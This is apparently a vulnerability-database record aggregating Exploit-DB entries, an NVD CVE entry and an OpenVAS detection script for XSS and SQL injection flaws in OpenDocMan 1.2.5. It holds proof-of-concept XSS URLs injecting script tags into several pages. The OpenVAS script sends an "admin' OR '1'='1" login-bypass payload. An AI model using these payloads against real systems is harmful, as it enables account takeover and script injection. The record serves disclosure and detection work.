ID EDB-ID:33301 Type exploitdb Reporter Amol Naik Modified 2009-10-21T00:00:00
Description
OpenDocMan 1.2.5 profile.php XSS. CVE-2009-3789. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/36777/info
OpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman/profile.php/"><script>alert(1)</script>
{"published": "2009-10-21T00:00:00", "id": "EDB-ID:33301", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "history": [], "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "hash": "d77d6996c1d186cfc23a68c05bf196be4c8ee45b14180df26e4fff7c7028f63f", "description": "OpenDocMan 1.2.5 profile.php XSS. CVE-2009-3789. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/33301/", "lastseen": "2016-02-03T18:54:06", "edition": 1, "title": "OpenDocMan 1.2.5 profile.php XSS", "osvdbidlist": ["59308"], "modified": "2009-10-21T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "sourceHref": "https://www.exploit-db.com/download/33301/", "references": [], "reporter": "Amol Naik", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/profile.php/\"><script>alert(1)</script>", "objectVersion": "1.0"}
{"cve": [{"lastseen": "2017-08-17T11:14:31", "references": ["http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt", "http://www.securityfocus.com/bid/36777", "https://exchange.xforce.ibmcloud.com/vulnerabilities/53887"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in OpenDocMan 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the last_message parameter to (1) add.php, (2) toBePublished.php, (3) index.php, and (4) admin.php; the PATH_INFO to the default URI to (5) category.php, (6) department.php, (7) profile.php, (8) rejects.php, (9) search.php, (10) toBePublished.php, (11) user.php, and (12) view_file.php; and (13) the caller parameter in a Modify User action to user.php.", "edition": 2, "reporter": "NVD", "published": "2009-10-26T13:30:00", "title": "CVE-2009-3789", "type": "cve", "enchantments": {"score": {"modified": "2017-08-17T11:14:31", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-3789"], "scanner": [], "modified": "2017-08-16T21:31:16", "cpe": ["cpe:/a:opendocman:opendocman:1.2.5"], "id": "CVE-2009-3789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3789", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T18:54:23", "osvdbidlist": ["59310"], "references": [], "description": "OpenDocMan 1.2.5 search.php XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 - search.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33303", "href": "https://www.exploit-db.com/exploits/33303/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/search.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33303/"}, {"lastseen": "2016-02-03T18:54:32", "osvdbidlist": ["59311"], "references": [], "description": "OpenDocMan 1.2.5 user.php XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 user.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33304", "href": "https://www.exploit-db.com/exploits/33304/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/user.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=\r\nhttp://www.example.com/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/\"><script>alert(123)</script><\"", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33304/"}, {"lastseen": "2016-02-03T18:53:29", "osvdbidlist": ["59303"], "references": [], "description": "OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33296", "href": "https://www.exploit-db.com/exploits/33296/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/toBePublished.php/\"><script>alert(1)</script>\r\nhttp://www.example.com/opendocman/toBePublished.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33296/"}, {"lastseen": "2016-02-03T18:53:59", "osvdbidlist": ["59307"], "references": [], "description": "OpenDocMan 1.2.5 department.php XSS. CVE-2009-3789 . Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 department.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33300", "href": "https://www.exploit-db.com/exploits/33300/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/department.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33300/"}, {"lastseen": "2016-02-03T18:53:52", "osvdbidlist": ["59306"], "references": [], "description": "OpenDocMan 1.2.5 category.php XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 category.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33299", "href": "https://www.exploit-db.com/exploits/33299/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/category.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PWFkZCZzdGF0ZT0y", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33299/"}, {"lastseen": "2016-02-03T18:54:14", "osvdbidlist": ["59309"], "references": [], "description": "OpenDocMan 1.2.5 rejects.php XSS. CVE-2009-3789 . Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 rejects.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33302", "href": "https://www.exploit-db.com/exploits/33302/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/rejects.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33302/"}, {"lastseen": "2016-02-03T18:53:37", "osvdbidlist": ["59304"], "references": [], "description": "OpenDocMan 1.2.5 index.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 index.php last_message Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33297", "href": "https://www.exploit-db.com/exploits/33297/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/index.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33297/"}, {"lastseen": "2016-02-03T18:54:39", "osvdbidlist": ["59312"], "references": [], "description": "OpenDocMan 1.2.5 view_file.php XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 view_file.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33305", "href": "https://www.exploit-db.com/exploits/33305/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/view_file.php/\"><script>alert(1)</script><\"?aku=aWQ9NiZzdGF0ZT0z", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33305/"}, {"lastseen": "2016-02-03T18:53:44", "osvdbidlist": ["59305"], "references": [], "description": "OpenDocMan 1.2.5 admin.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 admin.php last_message Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33298", "href": "https://www.exploit-db.com/exploits/33298/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/admin.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33298/"}, {"lastseen": "2016-02-03T18:53:22", "osvdbidlist": ["59302"], "references": [], "description": "OpenDocMan 1.2.5 add.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "edition": 1, "reporter": "Amol Naik", "published": "2009-10-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "OpenDocMan 1.2.5 add.php last_message Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33295", "href": "https://www.exploit-db.com/exploits/33295/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n\r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/add.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33295/"}], "openvas": [{"lastseen": "2018-09-02T00:05:58", "references": ["http://xforce.iss.net/xforce/xfdb/53886", "http://secunia.com/advisories/30750/", "http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt"], "pluginID": "1361412562310900885", "description": "This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2009 SecPod", "published": "2009-10-29T00:00:00", "title": "OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3801", "CVE-2009-3789", "CVE-2009-3788"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310900885", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900885", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_opendocman_xss_n_sql_inj_vuln.nasl 9350 2018-04-06 07:03:33Z cfischer $\n#\n# OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to cause Cross-Site Scripting or\n SQL Injection attacks by executing arbitrary codes with in the context of the\n affected application.\n Impact Level: Application.\";\ntag_affected = \"OpenDocMan version prior to 1.2.5.2\";\ntag_insight = \"- Input passed to the 'frmuser' and 'frmpass' parameters in 'index.php' is not\n properly sanitised before being used in SQL queries.\n - Input passed to the 'last_message' parameter in add.php, toBePublished.php,\n index.php, and admin.php, and input passed via the URL to category.php,\n department.php, profile.php, rejects.php, search.php, toBePublished.php,\n view_file.php, and user.php is not properly sanitised before being returned\n to the user.\";\ntag_solution = \"Upgrade to OpenDocMan version 1.2.5.2 or later.\n http://www.opendocman.com/\";\ntag_summary = \"This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900885\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-29 07:53:15 +0100 (Thu, 29 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3788\", \"CVE-2009-3789\", \"CVE-2009-3801\");\n script_bugtraq_id(36777);\n script_name(\"OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/30750/\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/53886\");\n script_xref(name : \"URL\" , value : \"http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_opendocman_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ndocmanPort = get_http_port(default:80);\nif(!docmanPort){\n exit(0);\n}\n\ndocmanVer = get_kb_item(\"www/\"+ docmanPort + \"/OpenDocMan\");\nif(!docmanVer){\n exit(0);\n}\n\ndocmanVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:docmanVer);\nif(docmanVer[2] && !safe_checks())\n{\n filename = string(docmanVer[2] + \"/index.php\");\n host = get_host_name();\n\n authVariables = \"frmuser=admin' OR '1'='1&frmpass=&login=Enter\";\n sndReq1 = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: http://\", host, filename, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(authVariables), \"\\r\\n\\r\\n\",\n authVariables);\n rcvRes1 = http_send_recv(port:docmanPort, data:sndReq1);\n if(egrep(pattern:\"Location: out.php\", string:rcvRes1))\n {\n security_message(docmanPort);\n exit(0);\n }\n\n sndReq2 = http_get(item:string(docmanVer[2], \"/index.php?last_message=\" +\n \"<script>alert(1)</script>\"), port:docmanPort);\n rcvRes2 = http_send_recv(port:docmanPort, data:sndReq2);\n if(rcvRes2 =~ \"HTTP/1\\.. 200\" && \"<script>alert(1)</script><\" >< rcvRes2)\n {\n security_message(docmanPort);\n exit(0);\n }\n}\n\nif(docmanVer[1])\n{\n # Check for OpenDocMan version prior to 1.2.5.2\n if(version_is_less(version:docmanVer[1], test_version:\"1.2.5.2\")){\n security_message(docmanPort);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:12", "references": ["http://xforce.iss.net/xforce/xfdb/53886", "http://secunia.com/advisories/30750/", "http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt"], "pluginID": "900885", "description": "This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2009 SecPod", "published": "2009-10-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3801", "CVE-2009-3789", "CVE-2009-3788"], "modified": "2017-01-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900885", "id": "OPENVAS:900885", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_opendocman_xss_n_sql_inj_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to cause Cross-Site Scripting or\n SQL Injection attacks by executing arbitrary codes with in the context of the\n affected application.\n Impact Level: Application.\";\ntag_affected = \"OpenDocMan version prior to 1.2.5.2\";\ntag_insight = \"- Input passed to the 'frmuser' and 'frmpass' parameters in 'index.php' is not\n properly sanitised before being used in SQL queries.\n - Input passed to the 'last_message' parameter in add.php, toBePublished.php,\n index.php, and admin.php, and input passed via the URL to category.php,\n department.php, profile.php, rejects.php, search.php, toBePublished.php,\n view_file.php, and user.php is not properly sanitised before being returned\n to the user.\";\ntag_solution = \"Upgrade to OpenDocMan version 1.2.5.2 or later.\n http://www.opendocman.com/\";\ntag_summary = \"This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.\";\n\nif(description)\n{\n script_id(900885);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-29 07:53:15 +0100 (Thu, 29 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3788\", \"CVE-2009-3789\", \"CVE-2009-3801\");\n script_bugtraq_id(36777);\n script_name(\"OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/30750/\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/53886\");\n script_xref(name : \"URL\" , value : \"http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_opendocman_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ndocmanPort = get_http_port(default:80);\nif(!docmanPort){\n exit(0);\n}\n\ndocmanVer = get_kb_item(\"www/\"+ docmanPort + \"/OpenDocMan\");\nif(!docmanVer){\n exit(0);\n}\n\ndocmanVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:docmanVer);\nif(docmanVer[2] && !safe_checks())\n{\n filename = string(docmanVer[2] + \"/index.php\");\n host = get_host_name();\n\n authVariables = \"frmuser=admin' OR '1'='1&frmpass=&login=Enter\";\n sndReq1 = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: http://\", host, filename, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(authVariables), \"\\r\\n\\r\\n\",\n authVariables);\n rcvRes1 = http_send_recv(port:docmanPort, data:sndReq1);\n if(egrep(pattern:\"Location: out.php\", string:rcvRes1))\n {\n security_message(docmanPort);\n exit(0);\n }\n\n sndReq2 = http_get(item:string(docmanVer[2], \"/index.php?last_message=\" +\n \"<script>alert(1)</script>\"), port:docmanPort);\n rcvRes2 = http_send_recv(port:docmanPort, data:sndReq2);\n if(rcvRes2 =~ \"HTTP/1\\.. 200\" && \"<script>alert(1)</script><\" >< rcvRes2)\n {\n security_message(docmanPort);\n exit(0);\n }\n}\n\nif(docmanVer[1])\n{\n # Check for OpenDocMan version prior to 1.2.5.2\n if(version_is_less(version:docmanVer[1], test_version:\"1.2.5.2\")){\n security_message(docmanPort);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
